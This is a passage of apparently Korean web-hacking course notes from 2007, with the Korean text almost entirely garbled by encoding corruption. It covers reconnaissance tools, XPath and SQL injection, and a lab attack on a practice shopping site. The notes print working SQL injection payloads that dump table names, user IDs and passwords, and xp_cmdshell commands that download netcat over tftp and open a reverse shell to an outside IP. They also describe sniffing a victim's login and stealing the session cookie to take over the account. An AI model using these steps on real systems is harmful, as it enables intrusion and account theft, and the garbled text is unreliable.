ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

ํ„ฐ๋„๋ง(plink)

ssh scp sftp (๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์•„๋‹Œ ์•„์Šคํ‚ค๋กœ ํ†ต์‹ž์„ ํ•˜๊ธฐ ๋•Œ๋ฌธ์—)

Nmap

Windumptcpdumpwireshark

-Follow tcp stream

-Filter out

-Time ํ‘œ๊ธฐ Mark

-Analysis Static

-Sniffer Pro ํ™œ์šฉ

DBMS Basic

-SELECTUPDATEINSERTDELETE

๊ธฐ๋ณธ์—ฐ์‚ฐ์ž

WHRER๊ฒ€์ƒ‰์กฐ๊ฑดHAVING๊ฒ€์ƒ‰์กฐ๊ฑด

์ง‘ํ•ฉ์—ฐ์‚ฐ์ž

-CREATEDROP command

-ACID TRANSACTIONCOMMIT ๊ฐœ๋…

๋ฐฑ์—…์˜ ์ข…๋ฅ˜

-FULL Incremental Differential BACKUP

์›น ๊ธฐ์ดˆ

์›น ๋ธŒ๋ผ์šฐ์ € rarr ๋ฐฉํ™”๋ฒฝ rarr ์›น ์„œ๋ฒ„ rarr ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ rarr ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค

http wwwsitecom showtablesasppage=1 amp name=username

(๋ฐฉํ™”๋ฒฝ)(์›น์„œ๋ฒ„) (์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜) (๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค)

Special Char amp = +

Escape parser ampใ…ก

amplt = lt (Less than) ํด๋ผ์ด์–ถํŠธ์ธต์—์„œ ์‹คํ–‰์•†๋˜๊ฒŒ ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์“ด๋‹ค

์‹œ๋Œ€๋ณ„ ๋“ฑ์žฅ ๊ธฐ์ˆ 

HTTP ํ”„๋กœํ† ์ฝœ ๋ช…์„ธ

HTML CSS

SCRIPTS JAVASCRIPTSVB

CGI C PERL

APPLET ACTIVE X ํด๋ผ์ด์–ถํŠธ ์ธก ์ž๋™ํ™”

HTTPS SSLTLS

์›น์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋“ฑ์žฅ ์„œ๋ฒ„์ธก ์ž๋™ํ™”(ASPPHPJSP)

XML SHTML ๋ฐ์ดํ„ฐ ์ €์žฅampํ†ต์‹ž ํฌ๋งท ์ค‘์‹œ

WEB SERVICEAJAX SOAP WSDL UDDI

CGI(Common Gate Interface)

-์›น ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์œผ๋กœ ์ •๋ณด๋ฅผ ์ ‚๋‹ฌํ•˜๊ณ  ์ ์ ƒํ•š ํ˜•ํƒœ๋กœ ์ •๋ณด๋ฅผ ๋ธŒ๋ผ์šฐ์ €์—๊ฒŒ ๋ฐ˜ํ™˜ํ•˜๊ธฐ ์œ„ํ•š ํ†ต์‹ž๊ทœ

์•ฝ(ํ‘œ์ค€)

-CGI๋Š” ์–ถ์–ด๊ฐ€ ์•„๋‹ˆ๋ผ ์ผ์ข…์˜ ํ†ต์‹ž ์ง€์นจ์„œ

-CGI์ง€์› ์–ถ์–ด์Šคํฌ๋ฆฝํŠธ (PERL C C++ JAVA PHP ASP JSCRIPT)

-์›น ํด๋ผ์ด์–ถํŠธ๋Š” HTTPFORM์˜ ํ˜•ํƒœ๋กœ ์›น ์„œ๋ฒ„์—๊ฒŒ ์ •๋ณด ์ ‚์†ก

-์›น ์„œ๋ฒ„๋Š” ํด๋ผ์ด์–ถํŠธ๋กœ๋ถ€ํ„ฐ ๋“ค์–ด์˜จ ์š”์ฒญ๊ณผ ํ™˜๊ฒฝ๋ณ€์ˆ˜ ์˜ ๊ฐ’์„ ์ฑ„์›Œ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์œผ๋กœ ์ ‚๋‹ฌ

-์Šคํฌ๋ฆฝํŠธ๋‚˜ ์ผ๋ฐ˜ LANGUAGE๋กœ CGI๋กœ ์ž‘์„ฑ์‹œ

Content-type texthtmlnn ํ—ค๋” ๋ฐ˜๋“œ์‹œ ๋ฐ˜ํ™˜ํ•˜์—ฌ์•ผ ํ•จ

ํ™˜๊ฒฝ๋ณ€์ˆ˜

SERVER_SOFTWARE REMOTE_HOST

QUERY_STRING REMOTE_ADDR

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 2

QUERY_STRING REMOTE_ADDR

SERVER_PORT HTTP_USER_AGENT

REQUEST_METHOD

CONTENT_TYPE

CONTENT_LENGTH

HTTP

HTTP(HYPERTEXT TRANSFER PROTOCOL)

-TCP ๊ธฐ๋ฐ˜์˜ ํ”„๋กœํ† ์ฝœ

-REQUEST ์™€ RESPONSE์˜ ๊ตฌ์กฐ๋กœ ๋˜์–ด ์žˆ์Œ

